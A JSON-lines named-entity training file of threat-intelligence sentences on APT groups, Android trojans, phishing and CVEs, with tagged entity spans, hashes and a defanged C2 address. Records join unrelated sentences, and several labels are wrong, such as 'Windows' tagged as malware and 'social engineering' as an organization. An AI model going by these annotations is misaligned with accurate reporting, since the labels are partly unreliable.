{"text": "During installation , Riltok asks the user for permission to use special features in AccessibilityService by displaying a fake warning : If the user ignores or declines the request , the window keeps opening ad infinitum . FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests . An interesting fact : the dropped library was compiled in 2014 and appears in our telemetry in August 2015 .", "spans": {"MALWARE: Riltok": [[22, 28]], "ORGANIZATION: FireEye": [[223, 230]], "THREAT_ACTOR: APT32": [[245, 250]], "ORGANIZATION: Vietnamese": [[291, 301]], "ORGANIZATION: government": [[302, 312]]}, "info": {"id": "cyberner_stix_train_001606", "source": "cyberner_stix_train"}}
{"text": "The example below steals Facebook data : All the other hardcoded applications targeted by the payload : Package name Name jp.naver.line.android LINE : Free Calls & Messages com.facebook.orca Facebook messenger com.facebook.katana Facebook com.whatsapp WhatsApp com.viber.voip Viber Parser payload Upon receiving a specific command , the implant can download a special payload to grab sensitive information from external applications . With deception and false flags increasingly being employed by threat actors , attribution is a hard and complicated task that requires solid evidence , especially in complex regions such as the Middle East . Some reporting suggests a number of other groups , including Axiom , APT17 , and Ke3chang , are closely linked to Winnti Group .", "spans": {"SYSTEM: Facebook": [[25, 33], [230, 238]], "SYSTEM: LINE : Free Calls & Messages": [[144, 172]], "SYSTEM: Facebook messenger": [[191, 209]], "SYSTEM: WhatsApp": [[252, 260]], "SYSTEM: Viber": [[276, 281]], "THREAT_ACTOR: threat actors": [[497, 510]], "THREAT_ACTOR: Axiom": [[704, 709]], "THREAT_ACTOR: APT17": [[712, 717]], "THREAT_ACTOR: Ke3chang": [[724, 732]], "THREAT_ACTOR: Winnti Group": [[757, 769]]}, "info": {"id": "cyberner_stix_train_001607", "source": "cyberner_stix_train"}}
{"text": "The app also creates hooks to prevent the phone from rebooting , going to sleep or allowing the user from pressing hardware buttons during the account creation process . These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations . FireEye has monitored APT17 ’s use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the C2 communication as queries to web search engines . These malicious PDF files were rigged with exploits attacking Adobe Reader versions 9 , 10 and 11 , bypassing its sandbox .", "spans": {"ORGANIZATION: private industry": [[208, 224]], "ORGANIZATION: military institutions": [[292, 313]], "ORGANIZATION: governmental organizations": [[320, 346]], "ORGANIZATION: political": [[395, 404]], "ORGANIZATION: human rights organizations": [[416, 442]], "ORGANIZATION: FireEye": [[445, 452]], "THREAT_ACTOR: APT17": [[467, 472]], "MALWARE: BLACKCOFFEE": [[483, 494]], "TOOL: C2": [[593, 595]], "MALWARE: malicious PDF files": [[651, 670]], "TOOL: Adobe Reader versions 9 , 10 and 11": [[707, 742]]}, "info": {"id": "cyberner_stix_train_001608", "source": "cyberner_stix_train"}}
{"text": "Yet the document cache published April 8 provides evidence that the NSA had once launched a series of successful computer-based intrusions against multiple high-profile foreign targets , including the Office of the President of Iran and the Russian Federal Nuclear Center . We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware .", "spans": {"ORGANIZATION: NSA": [[68, 71]], "THREAT_ACTOR: DustSquad": [[293, 302]], "SYSTEM: Android": [[411, 418]], "MALWARE: Windows": [[423, 430]], "MALWARE: malware": [[431, 438]]}, "info": {"id": "cyberner_stix_train_001609", "source": "cyberner_stix_train"}}
{"text": "Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system .", "spans": {"TOOL: Confucius'": [[0, 10]], "VULNERABILITY: CVE-2015-1641": [[105, 118]], "VULNERABILITY: CVE-2017-11882": [[123, 137]], "SYSTEM: Windows": [[241, 248]]}, "info": {"id": "cyberner_stix_train_001610", "source": "cyberner_stix_train"}}
{"text": "EventBot loaded library The loaded library dropped on the device . The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 . APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. and the Middle East .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: ITW": [[99, 102]], "MALWARE: RTF": [[262, 265]], "THREAT_ACTOR: APT35": [[293, 298]], "ORGANIZATION: military": [[317, 325]], "ORGANIZATION: diplomatic": [[328, 338]], "ORGANIZATION: government": [[343, 353]], "ORGANIZATION: media": [[356, 361]], "ORGANIZATION: energy": [[364, 370]], "ORGANIZATION: engineering": [[373, 384]], "ORGANIZATION: business services": [[387, 404]], "ORGANIZATION: telecommunications sectors": [[409, 435]]}, "info": {"id": "cyberner_stix_train_001611", "source": "cyberner_stix_train"}}
{"text": "Zen requires root to work correctly on the Android operating system . The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes . These clusters of activity raise interesting questions about the use of an identical silently-patched vulnerability , possibly by multiple threat groups . Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": {"MALWARE: Zen": [[0, 3]], "SYSTEM: Android": [[43, 50]]}, "info": {"id": "cyberner_stix_train_001612", "source": "cyberner_stix_train"}}
{"text": "This allows the malicious activity to evade detection .", "spans": {}, "info": {"id": "cyberner_stix_train_001613", "source": "cyberner_stix_train"}}
{"text": "Conclusion As our computing increasingly crosses multiple screens , we should expect to see threats extending across mobile and desktop environments . The attacker is provided with a USB containing malware developed for the CIA for this purpose , which is inserted into the targeted computer . Some analysts track Deep Panda and APT19 as the same group , but it is unclear from open source information if the groups are the same .", "spans": {"THREAT_ACTOR: attacker": [[155, 163]], "TOOL: USB containing malware": [[183, 205]], "THREAT_ACTOR: track Deep Panda": [[308, 324]], "THREAT_ACTOR: APT19": [[329, 334]]}, "info": {"id": "cyberner_stix_train_001614", "source": "cyberner_stix_train"}}
{"text": "Around 2011 , the infamous Zeus Trojan started using web injects that tricked users into downloading a mobile component called “ ZitMo ” ( Zeus in the Mobile ) . The attackers involved in these email campaigns leveraged a variety of distribution mechanisms to deliver the information stealing FormBook malware . The group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries .", "spans": {"MALWARE: Zeus Trojan": [[27, 38]], "MALWARE: ZitMo": [[129, 134]], "MALWARE: Zeus": [[139, 143]], "THREAT_ACTOR: attackers": [[166, 175]], "ORGANIZATION: financial": [[383, 392]], "ORGANIZATION: government": [[395, 405]], "ORGANIZATION: energy": [[408, 414]], "ORGANIZATION: chemical": [[417, 425]], "ORGANIZATION: telecommunications": [[428, 446]]}, "info": {"id": "cyberner_stix_train_001615", "source": "cyberner_stix_train"}}
{"text": "Additionally , as previously mentioned , the decoy document subject matter would likely be of interest to a few different potential targets in the Palestinian Territories .", "spans": {}, "info": {"id": "cyberner_stix_train_001616", "source": "cyberner_stix_train"}}
{"text": "But even though they share the use of Winnti , the BARIUM and LEAD activity groups are involved in very different intrusion scenarios .", "spans": {"MALWARE: Winnti": [[38, 44]], "THREAT_ACTOR: BARIUM": [[51, 57]], "THREAT_ACTOR: LEAD": [[62, 66]]}, "info": {"id": "cyberner_stix_train_001617", "source": "cyberner_stix_train"}}
{"text": "Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . So far , Unit 42 has seen infrastructure overlaps with servers hosting C2 servers for samples of the FFRAT , PlugX , Poison Ivy and Scieron Trojans , suggesting that the threat actors use these tools as the payload in their attacks .", "spans": {"THREAT_ACTOR: OilRig": [[65, 71]], "MALWARE: Clayslide delivery documents": [[79, 107]], "ORGANIZATION: Unit 42": [[346, 353]], "TOOL: C2": [[408, 410]], "MALWARE: FFRAT": [[438, 443]], "MALWARE: PlugX": [[446, 451]], "MALWARE: Poison Ivy": [[454, 464]], "MALWARE: Scieron Trojans": [[469, 484]]}, "info": {"id": "cyberner_stix_train_001618", "source": "cyberner_stix_train"}}
{"text": "In keeping with its shift to more overt tactics , the group appeared to publicly take credit for the attack , leaking the information on a website using the name “ Fancy Bears ” , an industry codename that was already widely used for the group .", "spans": {"THREAT_ACTOR: Fancy Bears": [[164, 175]]}, "info": {"id": "cyberner_stix_train_001619", "source": "cyberner_stix_train"}}
{"text": "Cobalt Strike payload : 7101fff478290d4db8a1c11a8d3b40cb , 4c81777551a772218519fb6dd1a6672aade4a936 , bdf1452b55b9974f3e9a4aea4439769a02fd931660ed655df92519a2a4df1261 .", "spans": {"TOOL: Cobalt Strike": [[0, 13]], "FILEPATH: 7101fff478290d4db8a1c11a8d3b40cb": [[24, 56]], "FILEPATH: 4c81777551a772218519fb6dd1a6672aade4a936": [[59, 99]], "FILEPATH: bdf1452b55b9974f3e9a4aea4439769a02fd931660ed655df92519a2a4df1261": [[102, 166]]}, "info": {"id": "cyberner_stix_train_001620", "source": "cyberner_stix_train"}}
{"text": "We discovered 561MB of exfiltrated data from 24 compromised Android devices while investigating this threat . Recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the GozNym group appears up to the task . Based on the 400+ samples of WEBC2 variants that we have accumulated , it appears that APT1 has direct access to developers who have continually released new WEBC2 variants for over six years . But a potential of attackers to misuse such access to infect hundreds of millions of Internet users creates a great risk . \"", "spans": {"SYSTEM: Android": [[60, 67]], "ORGANIZATION: bank": [[142, 146]], "ORGANIZATION: Kessem": [[182, 188]], "MALWARE: WEBC2": [[267, 272], [396, 401]], "THREAT_ACTOR: APT1": [[325, 329]], "THREAT_ACTOR: attackers": [[451, 460]]}, "info": {"id": "cyberner_stix_train_001621", "source": "cyberner_stix_train"}}
{"text": "In another instance , the DDE attack was used to deliver an open-source penetration testing toolkit called Koadic .", "spans": {"TOOL: Koadic": [[107, 113]]}, "info": {"id": "cyberner_stix_train_001622", "source": "cyberner_stix_train"}}
{"text": "It seems , “ Agent Smith ” prey list does not only have popular yet Janus vulnerable apps to ensure high proliferation , but also contain competitor apps of actor ’ s legitimate business arm to suppress competition . Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc . They register typo-squatting domains , impersonating legitimate companies . Several Democratic lawmakers released a report last week that accused TaxAct , H&R Block and TaxSlayer of embedding Meta and Google ’s tracking pixels on their sites , potentially violating U.S. law and sharing taxpayers ’ information with those companies .", "spans": {"MALWARE: Agent Smith": [[13, 24]], "VULNERABILITY: Janus": [[68, 73]], "ORGANIZATION: Group-IB": [[217, 225]], "TOOL: mail tracking websites": [[302, 324]], "TOOL: news portals": [[327, 339]], "TOOL: electronic books": [[342, 358]], "TOOL: computer graphics resources": [[361, 388]], "TOOL: music portals": [[391, 404]], "ORGANIZATION: Democratic lawmakers": [[497, 517]], "ORGANIZATION: TaxAct": [[559, 565]], "ORGANIZATION: H&R Block": [[568, 577]], "SYSTEM: TaxSlayer": [[582, 591]], "ORGANIZATION: Meta": [[605, 609]], "ORGANIZATION: Google ’s tracking pixels": [[614, 639]], "SYSTEM: sites": [[649, 654]]}, "info": {"id": "cyberner_stix_train_001623", "source": "cyberner_stix_train"}}
{"text": "] net www [ . The Arbor report describes the ongoing use of these four vulnerabilities in a series of espionage campaigns against not only Tibetan groups , but also others related to Hong Kong , Taiwan , and Uyghur interests . Attackers do not change their approach unless an external force or environmental shift compels them to . Following a successful infection , callbacks are made to the RAT 's command and control server at 94.158.247[.]27 .", "spans": {"ORGANIZATION: Arbor": [[18, 23]], "ORGANIZATION: Tibetan groups": [[139, 153]], "SYSTEM: control server": [[412, 426]]}, "info": {"id": "cyberner_stix_train_001624", "source": "cyberner_stix_train"}}
{"text": "Resistance to anti-malware protection The ability of malicious software to operate continuously on the victim ’ s mobile device is an important aspect of its development . the targets of the hacking group were in the automotive . It replaces the original instructions at 0x10BA with an unconditional jump ( jmp – 0xE9 ) to the address of the function from hpqhvsei.dll that decrypts and executes the encrypted payload embedded in the launcher . In 2015 GReAT reported that CozyDuke often spear phishes targets with emails containing a link to a hacked website .", "spans": {"ORGANIZATION: automotive": [[217, 227]], "FILEPATH: hpqhvsei.dll": [[356, 368]], "ORGANIZATION: GReAT": [[453, 458]], "MALWARE: CozyDuke": [[473, 481]]}, "info": {"id": "cyberner_stix_train_001625", "source": "cyberner_stix_train"}}
{"text": "Conclusions Cybereason Mobile Detects and Stops FakeSpy Indicators of Compromise INTRODUCTION For the past several weeks , Cybereason has been investigating a new version of Android malware dubbed FakeSpy , which was first identified in October 2017 and reported again in October 2018 . \bCharacterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East (including targets inside Iran itself) , as well as across Europe and in the United States . Previously , LookingGlass reported on a campaign they named \" Operation Armageddon \" , targeting individuals involved in the Ukrainian military and national security establishment .", "spans": {"ORGANIZATION: Cybereason Mobile": [[12, 29]], "MALWARE: FakeSpy": [[48, 55], [197, 204]], "ORGANIZATION: Cybereason": [[123, 133]], "SYSTEM: Android": [[174, 181]], "THREAT_ACTOR: Magic Hound": [[390, 401]], "ORGANIZATION: LookingGlass": [[566, 578]], "ORGANIZATION: military": [[688, 696]]}, "info": {"id": "cyberner_stix_train_001626", "source": "cyberner_stix_train"}}
{"text": "To provide a sense of the limited functionality within the webshell itself , the bitreeview.aspx AntSword webshell deployed in this attack ( SHA256: 15ecb6ac6c637b58b2114e6b21b5b18b0c9f5341ee74b428b70e17e64b7da55e ) was only 162 bytes .", "spans": {"FILEPATH: bitreeview.aspx": [[81, 96]], "TOOL: AntSword": [[97, 105]], "FILEPATH: 15ecb6ac6c637b58b2114e6b21b5b18b0c9f5341ee74b428b70e17e64b7da55e": [[149, 213]]}, "info": {"id": "cyberner_stix_train_001627", "source": "cyberner_stix_train"}}
{"text": "Depending if the victim has any of the targeted applications , the anti-virus installed or geographic location , the malware can harvest credentials from the targeted applications , exfiltrate all personal information or simply use the victim 's device to send SMS to spread the trojan The malware deploys overlaying webviews to trick the user and eventually steal their login credentials . MuddyWater is a relatively new APT that surfaced in 2017 . The malware behavior and code share similarities with an older KHRAT sample from May 2018 . Otherwise , your data will be sold to DarkNetDarkWeb .", "spans": {"THREAT_ACTOR: MuddyWater": [[391, 401]], "THREAT_ACTOR: APT": [[422, 425]], "MALWARE: KHRAT": [[513, 518]], "TOOL: DarkNetDarkWeb": [[580, 594]]}, "info": {"id": "cyberner_stix_train_001628", "source": "cyberner_stix_train"}}
{"text": "Microsoft labels activity groups using code names derived from elements in the periodic table .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]]}, "info": {"id": "cyberner_stix_train_001629", "source": "cyberner_stix_train"}}
{"text": "The current attack took advantage of the compromise of a high-profile Tibetan activist . The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 . While Night Dragon attacks focused specifically on the energy sector , the tools and techniques of this kind can be highly successful when targeting any industry .", "spans": {"TOOL: sctrls backdoor": [[93, 108]], "VULNERABILITY: CVE-2015-1641": [[162, 175]], "ORGANIZATION: energy sector": [[233, 246]]}, "info": {"id": "cyberner_stix_train_001630", "source": "cyberner_stix_train"}}
{"text": "This ransomware family ’ s long history tells us that its evolution is far from over . The Ke3chang attackers have been active since at least 2010 . in order to break the techniques we have to understand both of the obfuscation mechanisms and disassembler tool internals before we can automate the process . This includes hosting C&C domains that were used by Winnti such as mtrue.com , shenqi[.]kr and zhu[.]kr .", "spans": {"THREAT_ACTOR: Ke3chang": [[91, 99]], "THREAT_ACTOR: attackers": [[100, 109]]}, "info": {"id": "cyberner_stix_train_001631", "source": "cyberner_stix_train"}}
{"text": "Moreover , as we use mobile devices to access the web and phishing templates extend to mobile environments , we should expect to see a greater variety of integrated threats like the scheme we detail here . The attacker then infects and exfiltrates data to removable media . Dragonfly : Energetic Bear .", "spans": {"THREAT_ACTOR: attacker": [[210, 218]], "ORGANIZATION: media": [[266, 271]], "THREAT_ACTOR: Dragonfly": [[274, 283]], "THREAT_ACTOR: Energetic Bear": [[286, 300]]}, "info": {"id": "cyberner_stix_train_001632", "source": "cyberner_stix_train"}}
{"text": "The overall image of these ties is below in Figure 5 and paints a picture of an adversary with at least 5 malware families in their toolbox dating back to at least 2015 . The group will also use a compromised account to create scheduled tasks on systems or modify legitimate Windows services to install the HIGHNOON and SOGU backdoors . As we now know , by February 2013 the Dukes group had been operating MiniDuke and other toolsets for at least 4 and a half years .", "spans": {"THREAT_ACTOR: group": [[175, 180]], "TOOL: HIGHNOON": [[307, 315]], "TOOL: SOGU": [[320, 324]], "THREAT_ACTOR: Dukes group": [[375, 386]], "MALWARE: MiniDuke": [[406, 414]]}, "info": {"id": "cyberner_stix_train_001633", "source": "cyberner_stix_train"}}
{"text": "Stage 2 : Exodus Two The Zip archive returned by the check-in performed by Exodus One is a collection of files including the primary payload mike.jar and several compiled utilities that serve different functions . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East . For example , the VM or the sandbox must have the keyboard layout of the targeted countries and a disk serial number . While the Kritec skimmer hangs around the Google Tag Manager script , we believe it is not related to the other active campaigns .", "spans": {"MALWARE: Exodus Two": [[10, 20]], "MALWARE: Exodus One": [[75, 85]], "THREAT_ACTOR: attackers": [[218, 227]], "MALWARE: XLS files": [[274, 283]], "ORGANIZATION: employees working in the banking sector": [[287, 326]], "TOOL: VM": [[366, 368]], "TOOL: sandbox": [[376, 383]], "MALWARE: Kritec skimmer": [[477, 491]], "MALWARE: Google Tag Manager script": [[509, 534]]}, "info": {"id": "cyberner_stix_train_001634", "source": "cyberner_stix_train"}}
{"text": "Both the client and server uses the same API , but the client serializer cannot serialize server objects , because they are not the same as their “ mirrored ” objects inside the client .", "spans": {}, "info": {"id": "cyberner_stix_train_001635", "source": "cyberner_stix_train"}}
{"text": "PittyTiger leverages social engineering to deliver spearphishing emails , in a variety of languages including English , French and Chinese , and email phishing pages to their targets . After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually consolidate control over the network .", "spans": {"THREAT_ACTOR: PittyTiger": [[0, 10]], "ORGANIZATION: social engineering": [[21, 39]]}, "info": {"id": "cyberner_stix_train_001636", "source": "cyberner_stix_train"}}
{"text": "Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government , with a mission that would benefit nation-state geopolitical and economic needs . There is a file shortcut embedded in the malicious .docx file—one that will download an executable file from Dropbox that executes once clicked by the user .", "spans": {"THREAT_ACTOR: threat group": [[45, 57]], "ORGANIZATION: Iranian Government": [[104, 122]], "ORGANIZATION: nation-state geopolitical": [[159, 184]], "ORGANIZATION: economic": [[189, 197]], "FILEPATH: .docx": [[257, 262]], "TOOL: Dropbox": [[315, 322]]}, "info": {"id": "cyberner_stix_train_001637", "source": "cyberner_stix_train"}}
{"text": "Volexity has also found that , in addition to sending malware lures , the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages . Chafer , uses Backdoor.Remexi .", "spans": {"ORGANIZATION: Volexity": [[0, 8]], "THREAT_ACTOR: Patchwork threat actors": [[74, 97]], "MALWARE: Backdoor.Remexi": [[245, 260]]}, "info": {"id": "cyberner_stix_train_001638", "source": "cyberner_stix_train"}}
{"text": "SpyNote RAT is capable of performing a variety of alarming functions that includes : Activating the device ’ s microphone and listening to live conversations Executing commands on the device Copying files from the device to a Command & Control ( C & C ) center Recording screen captures Viewing contacts Reading SMS messages The screenshot below shows part of the sandbox ’ s report on the SpyNote RAT ’ s signature and detected functions : The fake Netflix app we are analyzing in this blog appears to be built using an updated version of SpyNote RAT builder , Prior to April 2018 , as described in Group-IB’s Silence: Moving into the darkside report , Silence’s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . The first successful bank robbery was committed by this group in January 2013 .", "spans": {"MALWARE: SpyNote RAT": [[0, 11], [390, 401], [540, 551]], "ORGANIZATION: Netflix": [[450, 457]], "THREAT_ACTOR: Group-IB’s": [[600, 610]]}, "info": {"id": "cyberner_stix_train_001639", "source": "cyberner_stix_train"}}
{"text": "In this case , a threat actor has been targeting customers of Bank Austria , Raiffeisen Meine Bank , and Sparkasse since at least January 2017 . This new Lotus Blossom campaign delivers a malicious RTF document posing as an ASEAN Defence Minister's Meeting (ADMM) directory (decoy) that also carries an executable (payload) embedded as an OLE object , the Elise backdoor . Elderwood : Elderwood Gang , Beijing Group , Sneaky Panda .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[154, 167]], "THREAT_ACTOR: Elderwood": [[373, 382]], "THREAT_ACTOR: Elderwood Gang": [[385, 399]], "THREAT_ACTOR: Beijing Group": [[402, 415]], "THREAT_ACTOR: Sneaky Panda": [[418, 430]]}, "info": {"id": "cyberner_stix_train_001640", "source": "cyberner_stix_train"}}
{"text": "Some hackers even went onto use the Cisco exploits in the wild . Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , Exfiltration of intellectual property regarding technology has been seen ) , and personal information fi\"om the victim 's network .", "spans": {"VULNERABILITY: Cisco exploits": [[36, 50]], "THREAT_ACTOR: Barium": [[74, 80]], "ORGANIZATION: technology": [[319, 329]]}, "info": {"id": "cyberner_stix_train_001641", "source": "cyberner_stix_train"}}
{"text": "Moreover , Wh1sks was able to find out the email addresses of five people who have subscribed to the Shadow Brokers' monthly dump service . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization . The targets are military or defense industry in particular countries , it used DDNS for C2 servers , and tracked connections from their victims by using target or campaign codes , as well as disguising the malware as document file , and using a dropper to install the malware and decoy file . A previous campaign of this APT group was uncovered by Talos in June 2017 , and since then very little of this operation was seen in the wild . ined in the archive is called DriverInstallerU.exe” but its metadata shows that its original name is Interenet Assistant.exe” . After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile . In this sample , however , the module names were changed from actors and characters’ names to car models , namely BMW_x1” , BMW_x2” and up to BMW_x8” . But , thanks to the attackers known affection for decoy documents that pose as news summaries , we were able to date the campaign back to March 2018 . With the experience gained from the APT attack that began in March 2017 , it seems this campaign has evolved into an attack with new capabilities , and an even more specific target , over a year later . These unknown actors continued launching DDoS attacks over the next few years . For simplicity , Kaspersky is calling them the BlackEnergy APT group . Since the middle of 2015 , one of the preferred attack vectors for BlackEnergy in Ukraine has been Excel documents with macros that drop the Trojan to disk if the user chooses to run the script in the document . A very good analysis and overview of the BlackEnergy attacks in Ukraine throughout 2014 and 2015 was published by the Ukrainian security firm Cys Centrum the text is only available in Russian for now , but can be read via Google Translate . The earliest signs of destructive payloads with BlackEnergy go back as far as June 2014 . BlackEnergy is a highly dynamic threat actor and the current attacks in Ukraine indicate that destructive actions are on their main agenda , in addition to compromising industrial control installations and espionage activities . Kaspersky will continue to monitor the BlackEnergy attacks in Ukraine and update our readers with more data when available . From Buhtrap perpetrating cybercrime for financial gain , its toolset has been expanded with malware used to conduct espionage in Eastern Europe and Central Asia . Throughout our tracking , we've seen this group deploy its main backdoor as well as other tools against various victims , but June 2019 was the first time we saw the Buhtrap group use a zero-day exploit as part of a campaign . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims . However , as the shift in targets occurred before the source code leak , we assess with high confidence that the same people behind the first Buhtrap malware attacks against businesses and banks are also involved in targeting governmental institutions . When Buhtrap was targeting businesses , the decoy documents would typically be contracts or invoices . The Buhtrap group is well known for its targeting of financial institutions and businesses in Russia . Figure 2 is a typical example of a generic invoice the group used in a campaign in 2014 . When the group's focus shifted to banks , the decoy documents were related to banking system regulations or advisories from FinCERT , an organization created by the Russian government to provide help and guidance to its financial institutions . We confirmed that this is a DarkHydrus Group's new attack targeting Middle East region . In July 2018 , Palo Alto disclosed DarkHydrus Group which showed its special interest to governments in Middle East . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . However , the final payload is something that welivesecurity have never seen associated with Buhtrap . It's coincident that both 'darkhydrus' APT group name and ‘Williams’ user name in PDB path found in this Twitter user . In recent APT incidents , Dark Hydruns tend to adopt Office VBA macro instead of Office 0day vulnerability in the consideration of cost reduction . ASERT uncovered a credential theft campaign we call LUCKY ELEPHANT where attackers masquerade as legitimate entities such as foreign government , telecommunications , and military . From at least February 2019 to present , the actors in the LUCKY ELEPHANT campaign copied webpages to mimic South Asian government websites as well as Microsoft Outlook 365 login pages and hosted them on their own doppelganger domains , presumably to trick victims into providing login credentials . ASERT suspects that the Actors use phishing emails to lure victims to the doppelganger websites and entice users to enter their credentials . It is important to note that one domain , yahoomail[.]cf is only associated with this group from February 2019 onward . In late 2018 , the domain was associated with a different APT group / campaign of Chinese origin . Based on our analysis into the activity , ASERT deems with moderate confidence that an Indian APT group is behind the LUCKY ELEPHANT campaign . The targets are typical of known Indian APT activity and the infrastructure was previously used by an Indian APT group . DoNot Team has a history of heavily targeting Pakistan , in addition to other neighboring countries . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China . DoNot Team’s confirmed use of this IP dates back to September 2018 , with a six-month gap until it was used to host doppelganger domains for the LUCKY ELEPHANT campaign in early February .", "spans": {"ORGANIZATION: Wh1sks": [[11, 17]], "THREAT_ACTOR: Shadow Brokers'": [[101, 116]], "FILEPATH: installed EXE file": [[144, 162]], "TOOL: DLL": [[197, 200]], "FILEPATH: Bisonal variant": [[212, 227]], "TOOL: C2": [[356, 358]], "MALWARE: dropper": [[513, 520]], "ORGANIZATION: Talos": [[616, 621]], "FILEPATH: DriverInstallerU.exe”": [[735, 756]], "FILEPATH: Interenet Assistant.exe”": [[806, 830]], "THREAT_ACTOR: attackers": [[919, 928], [1270, 1279]], "ORGANIZATION: victims who answer": [[938, 956]], "FILEPATH: BMW_x1”": [[1212, 1219]], "FILEPATH: BMW_x2”": [[1222, 1229]], "FILEPATH: BMW_x8”": [[1240, 1247]], "THREAT_ACTOR: unknown actors": [[1610, 1624]], "ORGANIZATION: Kaspersky": [[1701, 1710], [2527, 2536]], "THREAT_ACTOR: BlackEnergy": [[1822, 1833], [2256, 2267], [2298, 2309], [2566, 2577]], "MALWARE: Trojan": [[1896, 1902]], "ORGANIZATION: Cys Centrum": [[2109, 2120]], "THREAT_ACTOR: Buhtrap": [[2657, 2664], [2982, 2989], [3070, 3077], [3310, 3317], [3427, 3434], [3529, 3536], [4453, 4460]], "ORGANIZATION: we've": [[2842, 2847]], "THREAT_ACTOR: this group": [[2853, 2863]], "VULNERABILITY: exploit": [[3113, 3120]], "VULNERABILITY: CVE-2019-1132": [[3123, 3136]], "ORGANIZATION: businesses": [[3342, 3352], [3449, 3459]], "ORGANIZATION: banks": [[3357, 3362]], "ORGANIZATION: governmental institutions": [[3394, 3419]], "ORGANIZATION: financial institutions": [[3578, 3600]], "THREAT_ACTOR: group's": [[3727, 3734]], "ORGANIZATION: FinCERT": [[3842, 3849]], "THREAT_ACTOR: DarkHydrus": [[3991, 4001], [4087, 4097], [4347, 4357]], "ORGANIZATION: Palo Alto": [[4067, 4076]], "ORGANIZATION: governments": [[4141, 4152]], "VULNERABILITY: CVE-2018-8414": [[4244, 4257]], "ORGANIZATION: welivesecurity": [[4406, 4420]], "THREAT_ACTOR: 'darkhydrus'": [[4489, 4501]], "THREAT_ACTOR: ‘Williams’": [[4521, 4531]], "ORGANIZATION: Twitter user": [[4568, 4580]], "THREAT_ACTOR: Dark Hydruns": [[4609, 4621]], "MALWARE: Office VBA macro": [[4636, 4652]], "ORGANIZATION: ASERT": [[4731, 4736], [5213, 5218]], "THREAT_ACTOR: LUCKY ELEPHANT": [[4783, 4797], [4972, 4986]], "ORGANIZATION: foreign government": [[4856, 4874]], "ORGANIZATION: telecommunications": [[4877, 4895]], "ORGANIZATION: military": [[4902, 4910]], "ORGANIZATION: South Asian government websites": [[5021, 5052]], "ORGANIZATION: Microsoft Outlook": [[5064, 5081]], "TOOL: emails": [[5257, 5263]], "THREAT_ACTOR: Indian APT group": [[5661, 5677]], "THREAT_ACTOR: DoNot Team": [[5839, 5849]], "ORGANIZATION: Pakistani businessmen": [[6058, 6079]], "THREAT_ACTOR: DoNot": [[6099, 6104]]}, "info": {"id": "cyberner_stix_train_001642", "source": "cyberner_stix_train"}}
{"text": "The click fraud PHA requests a URL to the advertising network directly instead of proxying it through an additional SDK . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . In 2005 , the Chinese government passed an “ anti-secession ” law that signified its intention to use “ non-peaceful ” means to stymie any Taiwanese attempt to secede from China . While CISA or Microsoft have yet to disclose any specific vulnerabilities the actors exploited , the CISA report does say that the APT used a Microsoft account consumer key to forge tokens and impersonate targeted users .", "spans": {"TOOL: NetTraveler": [[156, 167]], "VULNERABILITY: CVE-2012-0158": [[189, 202]], "TOOL: NetTraveler Trojan": [[218, 236]], "ORGANIZATION: Chinese government": [[253, 271]], "ORGANIZATION: CISA": [[425, 429]], "ORGANIZATION: Microsoft": [[433, 442]], "ORGANIZATION: CISA report": [[520, 531]]}, "info": {"id": "cyberner_stix_train_001643", "source": "cyberner_stix_train"}}
{"text": "The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . It was a targeted attack we are calling \" Machete \" .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: military": [[92, 100]], "ORGANIZATION: organizations": [[101, 114]]}, "info": {"id": "cyberner_stix_train_001644", "source": "cyberner_stix_train"}}
